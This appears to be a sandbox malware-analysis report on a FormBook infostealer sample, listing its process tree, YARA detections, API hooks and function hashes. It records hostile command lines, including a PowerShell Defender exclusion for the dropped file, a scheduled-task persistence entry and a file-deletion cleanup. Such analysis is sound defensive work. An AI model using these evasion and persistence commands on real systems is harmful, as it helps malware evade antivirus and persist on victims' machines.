Dec 5, 2023 10:44:53.943591118 CET	320	IN	HTTP/1.1 403 Forbidden Server: awselb/2.0 Date: Tue, 05 Dec 2023 09:44:53 GMT Content-Type: text/html Content-Length: 118 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE0
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE0
GetMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE0
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE0

Target ID:	0
Start time:	10:42:53
Start date:	05/12/2023
Path:	C:\Users\user\Desktop\22#U0415.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\22#U0415.exe
Imagebase:	0x3f0000
File size:	1'198'080 bytes
MD5 hash:	E870ACD8E63F0BB015C54447DCC8202A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:42:54
Start date:	05/12/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tsnokiirph.exe
Imagebase:	0x2d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:42:54
Start date:	05/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:42:54
Start date:	05/12/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp
Imagebase:	0xd20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:42:54
Start date:	05/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:42:55
Start date:	05/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xab0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:42:55
Start date:	05/12/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	10:42:56
Start date:	05/12/2023
Path:	C:\Users\user\AppData\Roaming\tsnokiirph.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\tsnokiirph.exe
Imagebase:	0xeb0000
File size:	1'198'080 bytes
MD5 hash:	E870ACD8E63F0BB015C54447DCC8202A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:42:57
Start date:	05/12/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp8942.tmp
Imagebase:	0xd20000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:42:57
Start date:	05/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:42:57
Start date:	05/12/2023
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\systray.exe
Imagebase:	0xb30000
File size:	9'728 bytes
MD5 hash:	28D565BB24D30E5E3DE8AFF6900AF098
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	10:42:58
Start date:	05/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xe0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:42:58
Start date:	05/12/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xba0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:42:58
Start date:	05/12/2023
Path:	C:\Windows\SysWOW64\colorcpl.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\colorcpl.exe
Imagebase:	0xf80000
File size:	86'528 bytes
MD5 hash:	DB71E132EBF1FEB6E93E8A2A0F0C903D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:43:01
Start date:	05/12/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:43:01
Start date:	05/12/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	253
Total number of Limit Nodes:	16

Executed Functions

Function 09433AF9 Relevance: 4.0, Strings: 3, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CQ<, xrefs: 09433DB9
5;C, xrefs: 09433D98
C=, xrefs: 09433D75

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID: 5;C$C=$CQ<
API String ID: 0-3542527019
Opcode ID: a45e275bb36bfd989fef79474ce273b9e19ac6bc64b3090c69d3cb240877eb29
Instruction ID: 632db6debfa195b62c1e9da30155b8181cd4fac469add6323263b50dff53c83b
Opcode Fuzzy Hash: a45e275bb36bfd989fef79474ce273b9e19ac6bc64b3090c69d3cb240877eb29
Instruction Fuzzy Hash: 46B1D330A08255DFC7198F7988922BABBF1FF49310FD4C16BE1A6CA292D3359583CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0273138B Relevance: 2.8, Strings: 2, Instructions: 301
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 02731491
Te^q, xrefs: 02731656

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: c94ccd2cf252670dda39b32c47fd693674045b94bbfeb82158f64685f4c634aa
Instruction ID: 386dee36d5dbe8fe9e23f961180f27549c98c1c62102c127441684267a010cbe
Opcode Fuzzy Hash: c94ccd2cf252670dda39b32c47fd693674045b94bbfeb82158f64685f4c634aa
Instruction Fuzzy Hash: CBC16D75E042498FCF0ACFA5C4916EEFBB2FF89310F54D96AD40AAB216D7349805CB58

Uniqueness

Uniqueness Score: -1.00%

Function 02731428 Relevance: 2.7, Strings: 2, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 02731491
Te^q, xrefs: 02731656

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: Te^q$Te^q
API String ID: 0-3743469327
Opcode ID: 61ffc54bdaf987210aaf2db8f4fd3636d1046bf8edab5a57a4cef995454622fc
Instruction ID: 16ce2561b3995c67daa64ce66b93445055f8f929edaced4b9b42a1d7fe04620d
Opcode Fuzzy Hash: 61ffc54bdaf987210aaf2db8f4fd3636d1046bf8edab5a57a4cef995454622fc
Instruction Fuzzy Hash: EC81C174E042098FCB08CFEAC984A9EFBB2BF88310F24952AD519BB354DB349945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 094395F8 Relevance: 1.6, Strings: 1, Instructions: 369COMMON

Download Yara Rule

Strings

4'^q, xrefs: 09439B08

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: f90f4ab5aceb3fbb62abc9c9a5f27a8cdaeb60c7de742301afb0e61aecce5230
Instruction ID: 2d3e7e2d870d4360b6218184c9ea9cc1b87174cf71fa27f6f2c2463cff88e03f
Opcode Fuzzy Hash: f90f4ab5aceb3fbb62abc9c9a5f27a8cdaeb60c7de742301afb0e61aecce5230
Instruction Fuzzy Hash: BFE12B74A00209DFDB09DFB8C984AAEBBB6FBC8300F108565E405B7764DB799D85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02731BB8 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

%iC, xrefs: 02731DBB

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID: %iC
API String ID: 0-2350975110
Opcode ID: e32bdd91913bde85210d79d059d06ed207a98d6cb50b274b62b558cd95bca264
Instruction ID: 87aacb375ac0cb9bf9cf47e26c56bd0e9bb1ac5952a493c7877ea60b9c93ab2f
Opcode Fuzzy Hash: e32bdd91913bde85210d79d059d06ed207a98d6cb50b274b62b558cd95bca264
Instruction Fuzzy Hash: 64611B70E0520A8FCB09CFAAC5416AEFBF2EF89300F54D46AD419B7255E7348A42DF94

Uniqueness

Uniqueness Score: -1.00%

Function 02733408 Relevance: .4, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc761f441ad462883ddfd101b9f2ebff7f2734591119db1e51bffa804f017d7
Instruction ID: 7e703e3dc88580602e6ad94f5cc7df167544b507f737a2a18744ad619481b06e
Opcode Fuzzy Hash: 0fc761f441ad462883ddfd101b9f2ebff7f2734591119db1e51bffa804f017d7
Instruction Fuzzy Hash: C2026E75D04216CFCB26CFA9C4819BEBBB1BF49320B15A895D416AB217D334E942CFD8

Uniqueness

Uniqueness Score: -1.00%

Function 027334F0 Relevance: .3, Instructions: 302COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65843c8ac0a1abc1ba765822cbe61eab8adb5e600a8b35f6afcf639c565d56f6
Instruction ID: b8ee9218f5c4b1883e67997fb46100c03d6ea9f345d1b7910b36f9d9978babc3
Opcode Fuzzy Hash: 65843c8ac0a1abc1ba765822cbe61eab8adb5e600a8b35f6afcf639c565d56f6
Instruction Fuzzy Hash: 16D11B75E0521ADFCB14CFA9D4818AEFBB2FF89300B20A595D415AB315D734EA82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 09434210 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42e8657649781be0e4f83f0ae06b3401f59463c8ffee93a6f92b93b479d171d4
Instruction ID: 95ef390b384b0ab49c2382193e14801ceb2b4b6609c762fe1e8fa4577b806db8
Opcode Fuzzy Hash: 42e8657649781be0e4f83f0ae06b3401f59463c8ffee93a6f92b93b479d171d4
Instruction Fuzzy Hash: 6A519274E051199FCB04DFAAD5809EEFBF2BF89310F28D566E419A7225D730A942CF90

Uniqueness

Uniqueness Score: -1.00%

Function 09434201 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a569cd8f64d313657cb19e9d71990d0db5a3d67004d3f40f31fd9155e5380ab
Instruction ID: 33876263f47376b7715196de0077b5fa7b3a4badc2e7fef685bd5c23e5373a13
Opcode Fuzzy Hash: 3a569cd8f64d313657cb19e9d71990d0db5a3d67004d3f40f31fd9155e5380ab
Instruction Fuzzy Hash: 5541D375E016199FDB08CFAAD5845EEFBF2BF89310F28C166E419A7325DB309942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0943138C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55c225c3f02246fbd4024ee4a97db33f972f46971d2f27f3e889ada46a7c94e8
Instruction ID: 9cf0a502f7a87082a5f2cb3198964e1c3a86a2dc309fa8187e77e6d47422d53c
Opcode Fuzzy Hash: 55c225c3f02246fbd4024ee4a97db33f972f46971d2f27f3e889ada46a7c94e8
Instruction Fuzzy Hash: E541CCB4D052489FDB20DFA9D984ADEFFF0BB09314F20942AE418BB250D7759949CF94

Uniqueness

Uniqueness Score: -1.00%

Function 09430F44 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd6f4b08c6fa1894b15cea9de8e2fdbf114b7b0a814ad1357dea2cf867f0188d
Instruction ID: ec8a661c7b68f0300c7ec1ebdd8cc61556068a8a738ec1d285948a095438bedb
Opcode Fuzzy Hash: bd6f4b08c6fa1894b15cea9de8e2fdbf114b7b0a814ad1357dea2cf867f0188d
Instruction Fuzzy Hash: 5241ACB4D05248DFDB20DFA9C584B9EFBF0AB09304F20942AE419BB350D7759945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02732650 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8972634752d8bd6a87c203dce365422ffdf93298fbaaab3fa90c06a73f49ce
Instruction ID: 2297e53ee5ddc89f3afbaf24c393fa24cfb1f01384d3224d53ec690ab1a69c49
Opcode Fuzzy Hash: 4b8972634752d8bd6a87c203dce365422ffdf93298fbaaab3fa90c06a73f49ce
Instruction Fuzzy Hash: 07312D71E006588FDB18CFAAD8546DEFBF3AFC9300F24C16AD409A6254DB345A55CF50

Uniqueness

Uniqueness Score: -1.00%

Function 027308D1 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b557e93650913afab2c34f7f1257ffcb42d14bbb88cd0b53e25abbae7eee5af9
Instruction ID: a3be2b9e696d36a3d0e021169ea40256e715841107e290d58461cfe8f359bced
Opcode Fuzzy Hash: b557e93650913afab2c34f7f1257ffcb42d14bbb88cd0b53e25abbae7eee5af9
Instruction Fuzzy Hash: 1021FBB1E046598FEB59CF6BD84069EFBF3AFC9200F08C1BAC418A6225EB340945CF11

Uniqueness

Uniqueness Score: -1.00%

Function 09431754 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3beb6a600b3ad712f37cbe2ed9c3cca9c383c41e32e0b1fb921ed19408238af2
Instruction ID: ab1d4add9b759c0ef70900ca0d0c2623338ef9f032e2dbec5567c96af45cc4c9
Opcode Fuzzy Hash: 3beb6a600b3ad712f37cbe2ed9c3cca9c383c41e32e0b1fb921ed19408238af2
Instruction Fuzzy Hash: F0010CB9D0520C9B8B04CFA5E5418EEFFF6AB5A320F10A16AE814B3300E7345911CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09431760 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction ID: becfe7933b2a57f9852c9c38fe6966c689beadaf6566d4c37c0ebbea0e6aeb67
Opcode Fuzzy Hash: 9eb7edaa31dfbf35867dc96d8b8f8c426529f6e1b54484e160c576f9eb5ddf33
Instruction Fuzzy Hash: 67F07FB4D052089B8F04CFA9D4408EEFBF2AB5E310F10A12AE804B3310E73199018FA8

Uniqueness

Uniqueness Score: -1.00%

Function 04E55DC8 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04E55E56
GetCurrentThread.KERNEL32 ref: 04E55E93
GetCurrentProcess.KERNEL32 ref: 04E55ED0
GetCurrentThreadId.KERNEL32 ref: 04E55F29

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: df4e467d63e7b1a24c998d03957d15f1a3a86edb8880b918108a0f453805d6e0
Instruction ID: c04895927f2a339d6afa27776102bfd80299d60303f00199479c09ca44b6a0df
